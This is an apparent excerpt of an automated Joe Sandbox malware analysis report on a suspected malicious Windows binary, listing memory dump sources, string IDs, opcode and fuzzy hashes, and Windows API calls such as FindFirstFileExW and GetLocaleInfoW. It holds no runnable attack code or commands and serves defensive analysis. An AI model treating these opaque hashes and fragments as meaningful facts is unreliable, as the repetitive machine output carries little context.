                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: hd*$ hd*$ hd*
                                                                        • API String ID: 0-290621374
                                                                        • Opcode ID: 4d2e10ed73fab5cd9a8f3b8e05076b0c08ff89f4e140d0ad0c804e5e9b8a6cde
                                                                        • Instruction ID: 6efbffe6f71221bc6546074d77ea3d9a12bac75b7c2e55ff7a6326c1e5f9a0b9
                                                                        • Opcode Fuzzy Hash: 4d2e10ed73fab5cd9a8f3b8e05076b0c08ff89f4e140d0ad0c804e5e9b8a6cde
                                                                        • Instruction Fuzzy Hash: 931204756187008FCB18CF28C4A57AB7BE1AFCA314F25499EE89ACB751CB35CD418B52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `[c$`[c
                                                                        • API String ID: 0-3642393026
                                                                        • Opcode ID: 87a48dbb47124cf4444e3fb1876487aa88470a9aa88a989cc7948d7b96bf45d7
                                                                        • Instruction ID: a639e61228a2ccbf2024fe5c597c52b41133e32233741121efab5ac06ed6fa94
                                                                        • Opcode Fuzzy Hash: 87a48dbb47124cf4444e3fb1876487aa88470a9aa88a989cc7948d7b96bf45d7
                                                                        • Instruction Fuzzy Hash: E6A256766146404FDB08CE39C4E53FB77D3ABD5314F29986ED44ACB391DABAC84A8B01
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: t8y$t8y
                                                                        • API String ID: 0-2720595132
                                                                        • Opcode ID: 6528b8fcd41bd6f1ba16b757769fabe9872a47bd7c478230a8b036e3d740c195
                                                                        • Instruction ID: 0b60cad05a07138500e66b225a99b1f1ef0def6dbf3ed66c2cd5caa75a9d86a1
                                                                        • Opcode Fuzzy Hash: 6528b8fcd41bd6f1ba16b757769fabe9872a47bd7c478230a8b036e3d740c195
                                                                        • Instruction Fuzzy Hash: DF72157BB61A004BA71CC96ACCE23F767D3ABD8314729E47E845BC7645DDBDD8068A00
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `[c$`[c
                                                                        • API String ID: 0-3642393026
                                                                        • Opcode ID: 395d1b4680d4bdab7d5b13e5d133bb9b689f2f9a4d23f27bebd5d31621812b36
                                                                        • Instruction ID: 2af6409997f0197a686dbefe66dcfda43b6a364dcd25becbe162a29b92a4f1a4
                                                                        • Opcode Fuzzy Hash: 395d1b4680d4bdab7d5b13e5d133bb9b689f2f9a4d23f27bebd5d31621812b36
                                                                        • Instruction Fuzzy Hash: 1F62687BF65A104BE70CCA2AC8923AB67C3ABC9314F1ED47E989AC7345DD79CC064641
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: d
                                                                        • API String ID: 0-2564639436
                                                                        • Opcode ID: 43a1bee4c84296bf7b3038ac42f5a4897a90b14269f35a2e95d62ccdd744f51f
                                                                        • Instruction ID: 618dfd28c92191975c03209d7dc852d82950b1f6aa550b6b477988581ac4ae89
                                                                        • Opcode Fuzzy Hash: 43a1bee4c84296bf7b3038ac42f5a4897a90b14269f35a2e95d62ccdd744f51f
                                                                        • Instruction Fuzzy Hash: E4D28B7BF65A200BA718C9BA8CD23EBA6C357D9310F1E947E9999D7341DDBDCC060680
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: _q$_q
                                                                        • API String ID: 0-3608900609
                                                                        • Opcode ID: ff0c506b00677db6f4b74135cecbf023aa6016cd3a654f83bdfe80a48f4edb0b
                                                                        • Instruction ID: f17768ada3ee301087e26360f63997f1443ea32a54f44255a9d0d86844591510
                                                                        • Opcode Fuzzy Hash: ff0c506b00677db6f4b74135cecbf023aa6016cd3a654f83bdfe80a48f4edb0b
                                                                        • Instruction Fuzzy Hash: 01F127366087009FD718CA29C4D567FB7D2EBCA300F24986EE886D7351EA35DC45DB52
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6v1_$6v1_
                                                                        • API String ID: 0-2921681065
                                                                        • Opcode ID: 8be43c167e8a8db8993ed3beac30effc992f71785e2c85bb2875516c2c6c615e
                                                                        • Instruction ID: 71af96c4869851fb0d4dbaac71cfabcaa1dee2ab220b42cb0d8d82b1d7aa436e
                                                                        • Opcode Fuzzy Hash: 8be43c167e8a8db8993ed3beac30effc992f71785e2c85bb2875516c2c6c615e
                                                                        • Instruction Fuzzy Hash: CBB14B76A183018F9718CE2DC48167EBBE3ABC8314F19496DF889D7345DAB8DC418B93
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `[c$`[c
                                                                        • API String ID: 0-3642393026
                                                                        • Opcode ID: e7f02a8db528d642ccd7a7beb81330a9ec9cb131e38f00c75a540ae6f876463a
                                                                        • Instruction ID: bf89918fca5c082b0b3cf3be46f0303a90fa9f6b253da0883504daac0c34cb2d
                                                                        • Opcode Fuzzy Hash: e7f02a8db528d642ccd7a7beb81330a9ec9cb131e38f00c75a540ae6f876463a
                                                                        • Instruction Fuzzy Hash: 5481693A7406028FDB04DA29C8E43FB7BD3ABD9354F55D879D448CB352CA7ADC4A8A41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: L
                                                                        • API String ID: 0-2909332022
                                                                        • Opcode ID: f0e95ae2691482cafa4afe4ea29008b76309c6a1147a64d2f1d47203aee38a9f
                                                                        • Instruction ID: e2772ba67db8555dcdf3790e4081a446dd124afea5707899cd7408f30c0de36d
                                                                        • Opcode Fuzzy Hash: f0e95ae2691482cafa4afe4ea29008b76309c6a1147a64d2f1d47203aee38a9f
                                                                        • Instruction Fuzzy Hash: BC124C76A287008FDB18DE28C4D03FFB7E1ABD9310F25896EE88597350DA75CC458B82
                                                                        APIs
                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,05390158,?,00000008,?,?,00BD8F61,05390158,?,00000008,?,?,00BDABE3,00000000), ref: 00BD9233
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionRaise
                                                                        • String ID:
                                                                        • API String ID: 3997070919-0
                                                                        • Opcode ID: 1a6f7e59fbade3cd2d894c5743218847e24e3c4537d4f922b4627a4ee8729e50
                                                                        • Instruction ID: 16da64ec24eb5cb5ef6203870fbd879f26f95af2b82dac4db825f946557a83c0
                                                                        • Opcode Fuzzy Hash: 1a6f7e59fbade3cd2d894c5743218847e24e3c4537d4f922b4627a4ee8729e50
                                                                        • Instruction Fuzzy Hash: 28B13C31610609AFD719CF28C4CABA5BBE0FF45364F258699E899CF3A1D335D992CB40
                                                                        APIs
                                                                          • Part of subcall function 00BD0A4F: HeapAlloc.KERNEL32(00000008,C0C2D04E,C0C2D04E,?,00BCFB69,00000001,00000364,C0C2D04E,00000002,000000FF,?,00BD5F80,00000000,00BC990C,?,EDF9CBD8), ref: 00BD0A90
                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BD575D
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00BD5851
                                                                        • FindClose.KERNEL32(00000000), ref: 00BD5890
                                                                        • FindClose.KERNEL32(00000000), ref: 00BD58C3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                        • String ID:
                                                                        • API String ID: 2701053895-0
                                                                        • Opcode ID: 0b9389c4032eed93f6e1faf3223edbea241269990cbe2448430bfc8342eb14bf
                                                                        • Instruction ID: 0f38be6b03256ad3d19ca4c7c9795e46d48e149fa9e241de429acb337aa3038e
                                                                        • Opcode Fuzzy Hash: 0b9389c4032eed93f6e1faf3223edbea241269990cbe2448430bfc8342eb14bf
                                                                        • Instruction Fuzzy Hash: 4E515471900609AFDB20AF289C84ABEF7EADF45314F6441EFF45897301FA309D418B24
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00BC0EC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FeaturePresentProcessor
                                                                        • String ID:
                                                                        • API String ID: 2325560087-0
                                                                        • Opcode ID: 4202deba80d20737cdbc2eac4e1e711ed172bb050237824a5a7ce7fa89a19343
                                                                        • Instruction ID: 29df7093196d1481515c231ef8cccae260f0b2bc831fd4f22ba0b5eef8f1cdeb
                                                                        • Opcode Fuzzy Hash: 4202deba80d20737cdbc2eac4e1e711ed172bb050237824a5a7ce7fa89a19343
                                                                        • Instruction Fuzzy Hash: 495149B1A15205DFEB24CF59D981BAABBF4FB48310F2585AED401EB261D774D980CF60
                                                                        APIs
                                                                          • Part of subcall function 00BCF9CB: GetLastError.KERNEL32(00000000,?,00BD1D01), ref: 00BCF9CF
                                                                          • Part of subcall function 00BCF9CB: SetLastError.KERNEL32(00000000,?,?,00000028,00BCA98F), ref: 00BCFA71
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00BD4F18
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 3736152602-0
                                                                        • Opcode ID: be8b51a83349b3c1b8346325441cedf9c48e0d9e36e7f29200fce779df56c256
                                                                        • Instruction ID: 24fddda77629fe2c64ff132cfcb87aa9582e9d52e14ea4201eeb481f54500d0b
                                                                        • Opcode Fuzzy Hash: be8b51a83349b3c1b8346325441cedf9c48e0d9e36e7f29200fce779df56c256
                                                                        • Instruction Fuzzy Hash: C7217F72611216ABDB289B25DD82BBAB7E8EF44310B1000BBF905D7291FB74ED418B50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0
                                                                        • API String ID: 0-4108050209
                                                                        • Opcode ID: d2573ae1f46e58b50f38a246feef0cb8ae4f0475f772d7d15099bdfa24c322c1
                                                                        • Instruction ID: 8467659cf78605b0777f85748269acd166f7060d474cd1264477a74e0c9ec5db
                                                                        • Opcode Fuzzy Hash: d2573ae1f46e58b50f38a246feef0cb8ae4f0475f772d7d15099bdfa24c322c1
                                                                        • Instruction Fuzzy Hash: 85B19070904B0B8BCB388F688599FBEB7F5EB05300F1446ADE493A7691D671BAC1CB51
                                                                        APIs
                                                                          • Part of subcall function 00BCF9CB: GetLastError.KERNEL32(00000000,?,00BD1D01), ref: 00BCF9CF
                                                                          • Part of subcall function 00BCF9CB: SetLastError.KERNEL32(00000000,?,?,00000028,00BCA98F), ref: 00BCFA71
                                                                        • EnumSystemLocalesW.KERNEL32(00BD4C12,00000001,00000000,?,-00000050,?,00BD4A02,00000000,-00000002,00000000,?,00000055,?), ref: 00BD4BE9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                        • String ID:
                                                                        • API String ID: 2417226690-0
                                                                        • Opcode ID: 693d3d00f760b8315deeeaa631cf36b03c2b6f9c43a01a4fe7ca9992d5e580b7
                                                                        • Instruction ID: 8578fcee331c36ca8a5be3c394ce4546f43252abdc3999e9c205aeea7dd2e102
                                                                        • Opcode Fuzzy Hash: 693d3d00f760b8315deeeaa631cf36b03c2b6f9c43a01a4fe7ca9992d5e580b7
                                                                        • Instruction Fuzzy Hash: EB11C6372007019FDB189F39889167ABBD1FF84369B18456EE98647B40E771B942CB40
                                                                        APIs
                                                                          • Part of subcall function 00BCF9CB: GetLastError.KERNEL32(00000000,?,00BD1D01), ref: 00BCF9CF
                                                                          • Part of subcall function 00BCF9CB: SetLastError.KERNEL32(00000000,?,?,00000028,00BCA98F), ref: 00BCFA71
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00BD5038
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 3736152602-0
                                                                        • Opcode ID: 49111a8e8b4e5fea646b6f7ab58d6519a3b3473daeffa6c0cce608e3a1a441bf
                                                                        • Instruction ID: 496f9164d9db9769b3c92c1d40843bc12c05dee225fd00078b7fc6b0a05ff5e6
                                                                        • Opcode Fuzzy Hash: 49111a8e8b4e5fea646b6f7ab58d6519a3b3473daeffa6c0cce608e3a1a441bf
                                                                        • Instruction Fuzzy Hash: 9811A332611506ABDB24AF28DD42BBAB7ECDF05310B1041BBE501D7241EB74ED458B90
                                                                        APIs
                                                                          • Part of subcall function 00BCF9CB: GetLastError.KERNEL32(00000000,?,00BD1D01), ref: 00BCF9CF
                                                                          • Part of subcall function 00BCF9CB: SetLastError.KERNEL32(00000000,?,?,00000028,00BCA98F), ref: 00BCFA71
                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00BD4E2E,00000000,00000000,?), ref: 00BD51BD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 3736152602-0
                                                                        • Opcode ID: 79542d69c778c64944e6603c84d3c80b5a6704559c6d20ca0b95cc8bb6006a93
                                                                        • Instruction ID: 5495309d57bb1346639035206be6772ed1971cfb73faa01b15361332875d604f
                                                                        • Opcode Fuzzy Hash: 79542d69c778c64944e6603c84d3c80b5a6704559c6d20ca0b95cc8bb6006a93
                                                                        • Instruction Fuzzy Hash: 0101DB32600512BBDB385A24CC46BBAB7E4EB40355F1544BAED56A3280FA70FD41C690
                                                                        APIs
                                                                          • Part of subcall function 00BCF9CB: GetLastError.KERNEL32(00000000,?,00BD1D01), ref: 00BCF9CF
                                                                          • Part of subcall function 00BCF9CB: SetLastError.KERNEL32(00000000,?,?,00000028,00BCA98F), ref: 00BCFA71
                                                                        • EnumSystemLocalesW.KERNEL32(00BD4EC4,00000001,?,?,-00000050,?,00BD49CA,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00BD4EAF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
